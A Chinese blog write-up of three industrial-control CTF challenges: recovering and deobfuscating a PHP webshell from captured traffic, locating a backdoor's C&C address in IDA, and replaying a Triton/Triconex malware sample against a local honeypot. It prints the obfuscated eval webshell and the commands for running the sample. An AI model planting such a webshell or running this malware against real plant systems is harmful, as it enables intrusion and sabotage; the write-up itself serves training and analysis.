纵横网络靶场-隐藏的黑客-恶意软件后门分析-恶意软件样本分析

已于 2023-10-17 22:28:37 修改
阅读量649 收藏 1
点赞数 1
文章标签: 网络
于 2023-10-16 14:49:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/133857116
版权

目录

1、隐藏的黑客

2、恶意软件后门分析 

3、恶意软件样本分析 

1、隐藏的黑客

题目描述:

根据情报得知工控现场发现某SCADA系统被黑客攻破,附件为黑客在目录留下的文件和当时时间段捕获到的一部分流量包,你能根据这些信息分析出蛛丝马迹来么flag形式为 flag{}。

两个附件,一个流量 一个都是一句话木马文件。猜测黑客进行文件上传,所以先过滤http协议。

 找到可以文件webshell.php。追踪流查看原始数据

复制到010,可以发现是压缩包.删除头尾多余的字节

 要密码且为真加密,这时候就要用到upload目录,写脚本提取。

import os
import re

a = []

for i in os.listdir(r'E:\ctf-web\工控题目\隐藏的黑客\upload'):
    with open('E:\\ctf-web\\工控题目\\隐藏的黑客\\upload\\'+i,'r') as f:
        passwd = re.findall('\[(.*?)\]',f.readline())[0]
        a.append(passwd)

with open('E:\\E-Down\\1.txt','a+') as d:
    for i in a:
        d.write(i+'\n')

 选择字典爆破.得到密码为7b8b965ad4bca。解压的webshell.php

<?php

error_reporting(0);

@$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");
@$str="ZXZhbCgkX";
@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
@$count = 0;
for($x=0;$x<=9;$x++){
        if (in_array($x, @$c)){
                @$str=@$str.@$c[@$count];
                if ($count == 2)
                {       
                        @$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str));
                }
                @$count++;
        }
}
?>

稍微修改原本代码得:

<?php

error_reporting(0);

@$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");
@$str="ZXZhbCgkX";
@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
@$count = 0;
for($x=0;$x<=9;$x++){
        if (in_array($x, @$c)){
                @$str=@$str.@$c[@$count];
                if ($count == 2)
                {       
                        echo "@$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str))";
                }
                @$count++;
        }
}
?>

 结果为:

@assert(@base64_decode(@ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))

解码得flag

2、恶意软件后门分析 

题目描述:

工程师的笔记本上发现了恶意软件,经排查是一款著名针对工业领域的病毒,溯源分析远控样本文件,确认远程C&C连接地址。flag形式为 flag{}

题目要求找远控服务器ip地址

无壳32位

从start开始分析,进入sub_402261

再进入sub_402174

 

得到答案

3、恶意软件样本分析 

题目描述:某家工厂曾发生过宕机事件案例,为防止再发生此事找了技术人员分析攻击行为流量数据包后发现许多异常端口连接记录,最终得到了这个罪魁祸首的病毒样本,请分析病毒样本尝试复现事件案例帮助工厂实施应急演练,flag形式为 flag{}。

解压文件,阅读readme文件,可以找到该文件的原地址

病毒文件

主要运行decompiled_code目录下的script_test.py。接着就要考虑启蜜罐,捕获病毒的通信,最后就是tcpdump保存通信过程,进行分析.

蜜罐

 首先将script_test.py复制到library目录下.接着先开启蜜罐

python2 triconex_honeypot.py

接着开启tcpdump监听本地1502端口

sudo tcpdump -nnvv -i lo port 1502 -w 1.pcap

 最后运行病毒

python2 script_test.py 127.0.0.1

 打开1.pcap进行流量分析

追踪udp,显示原始数据,一个一个试,第一个就是答案

He@11
关注
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[纵横网络靶场社区]组态软件分析
末初的CSDN博客
09-21 766
签到题,test.PCZ用file命令查看发现是zip文件 修改后缀为zip,直接解压发现有密码。真加密 但是仔细观察发现演示文稿文件夹没有加密,选定解压;直接在整个文件夹下找flag flag{D076-4D7E-92AC-A05ACB788292} ...
[纵横网络靶场社区]恶意软件后门分析
末初的CSDN博客
09-21 1000
32位的exe文件,修改后缀为.exe,丢进ida里面分析;ida我也是不很懂,直接从start函数块开始分析 返回了sub_402261()函数块的结果,继续看sub_402261()的内容 发现这个函数块还是主要执行sub_402174(),继续查看sub_402174()函数块 发现个ip,提交就对了。。。 flag{5.39.218.152} ...
纵横网络靶场社区-隐藏黑客
底层社会中的弱智
03-30 1237
分析流量包 筛选http协议流量包 使用查询webshell等关键字 找到webshell.php进行取证 可以看出文件以PK开头是一个压缩包文件的头部信息 压缩包中存在webshell.php文件 使用010editor新建Hex文件 复制到010editor中 另存为1.zip 需要解压密码 写个脚本获取upload文件中每个webshell的登陆密码 import os,sys import re if __name__ == '__ma...
[纵横网络靶场社区]隐藏黑客
末初的CSDN博客
09-16 1233
upload文件夹是一堆webshell 流量包含有部分HTTP流量,发现了一个webshell.zip;foremost尝试分离并没有直接分离出来,猜测可能混合了一些其他数据导致没有直接分离出zip文件。尝试导出HTTP对象 导出的文件夹中发现一些字节流文件,其中发现了zip的字节流数据 使用010 Editor打开,去掉前面5个干扰字节,重命名为flag.zip 有加密,真加密;尝试爆破无果,猜测upload文件夹下的webshell密码中可能存在压缩包密码。Python简单处理提取出这些密码.
攻防世界 Crypto高手进阶区 5分题 恶意软件后门分析
闵行小鱼塘
01-08 919
继续ctf的旅程,攻防世界Crypto高手进阶区的5分题,本篇是恶意软件后门分析的writeup
OSX.Mokes.a.后门恶意软件详解
SAKAISON的博客
09-10 1124
恶意软件概况  OSX.Mokes.a.后门木马是最新发现的OS X的变种,它是一个跨平台的后门程序,能够在几大主要操作系统(Windows,Linux,OS X)中运行。请参阅我们关于Windows和Linux的变种的分析。 该恶意软件Home族能够窃取各类从受害者的机器窃取不同类型的数据(截图、音频/视频捕捉、办公文件、按键) 此后门程序也能在受害者的计算机上执行任意命令
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
热门推荐
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
纵横网络靶场资源题-过程详解
09-21
涵盖靶场数道题目,解析过程经过了多次认证,并做了多方查阅,过程详细
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
恶意代码分析实战——恶意程序后门
aming小老弟
02-06 1021
QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 纪年科技aming 网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。 叮叮叮:产品已上线 —>关注 官方-微信公众号——济南纪年信息科技有限公司 民生项目:商城加盟/娱乐交友/创业商圈/外包兼职开发-项目发布/ 安全项目:态势感..
恶意软件分析实战03-一个后门的逆向分析
輚至消亡
07-20 759
1. Lab03-03 先查壳发现无壳, VC++6.0编写: VT上走一波, 57个杀毒引擎认定是恶意的。 有资源表而且那么大,可能夹了私活: ResHacker查看资源节内容, 的确是带了东西,这玩意感觉也不像是多媒体资源。也有可能是被加密了存进去的或者加壳了。 来查询一下导入表: 该恶意程序只导入了kernel32.dll,从导入表的导入API来判断, 该恶意进程可能: 1. 使用了傀儡进程技术,即挂起创建一个合法的程序但却在内部执行非法的shellcode ...
纵横网络靶场 部分wp
qq_61768489的博客
08-14 1716
生产系统的运维人员在进行日常审计中发现设备存在大量的告警日志,自动化工程师在进行上载分析中也没有发现相关的问题所在,请您帮助进行分析相关设备的存在的问题,flag格式为:flag{hex数据}flag形式为 flag{}。某厂区遭到黑客恶意扫描,此为安全设备截取的一部分流量包,请尝试分析该流量文件,帮助安全人员找到黑客的行为轨迹,并找到隐藏的FLAG,flag形式为 flag{}工业网络中存在的异常,尝试通过分析PACP流量包,分析出流量数据中的异常 点,并拿到FLAG,flag形式为 flag{}。...
纵横网络靶场社区 工控
weixin_51387754的博客
10-31 1270
社区旨为工控安全技术爱好者打造线上实训与竞赛社区社区将远程接入虚实结合靶场环境,为工控安全技术研究人员开放基础资源,提供学习交流资源共享平台。
恶意软件Linux/Mumblehard分析
weixin_33950035的博客
03-08 316
杀戮 · 2015/05/05 10:09From:http://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf0x00 简介我们发现Linux/ Mumblehard的原因来自于某天某网管联系我们,他的服务器因为不断发送垃圾邮件被列入了黑名单。我们dump了服务器上其中一个奇怪进程的内存,这玩意连接到了一个不同的S...
纵横网络靶场--协议相关writeup
最新发布
潇逗
04-10 1113
纵横网络网址: https://game.fengtaisec.com/黑客通过外网进入一家工厂的控制网络,之后对工控网络中的操作员站系统进行了攻击,最终通过工控协议破坏了正常的业务。我们得到了操作员站在攻击前后的网络流量数据包,我们需要分析流量中的蛛丝马迹,找到FLAG,flag形式为 flag{} 下载pcap文件。 方法一: 直接找modbus协议 ,直接length进行排序,长度117也比较可疑,打开就是flag 点击追踪流-》TCP 方法二:拿到流量分析的文件,观察到他现实读取了线圈和保存寄存器
[纵横网络靶场社区]隐信道数据安全分析
末初的CSDN博客
09-14 1166
附件flag-woody.mp3是一首歌,mp3格式,听了一下,Audacity打开看了一下没发现什么异常;mp3隐写试了一下也没什么线索。回到题目名称和描述。信道隐写,某种private的方式将信息传递出去。使用010 Editor打开,分析文件结构。 可以发现在每个MPEG_FRAME mf下的4字节MPEG_HEADER mpeg_hdr中有一个1 bit的private bit,提取前8个MPEG_HEADER mpeg_hdr下的private bit即可得到 01000110 转换成十进制.
Upload-labs靶场攻略:文件上传漏洞分析
"Upload-labs通关手册.pdf - 一个关于渗透测试的靶场平台,专注于文件上传漏洞的学习与实践。" Upload-labs是一个专门为...记得在实践中遵守道德黑客的原则,只在授权的环境中进行测试,以确保网络安全和合法合规。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值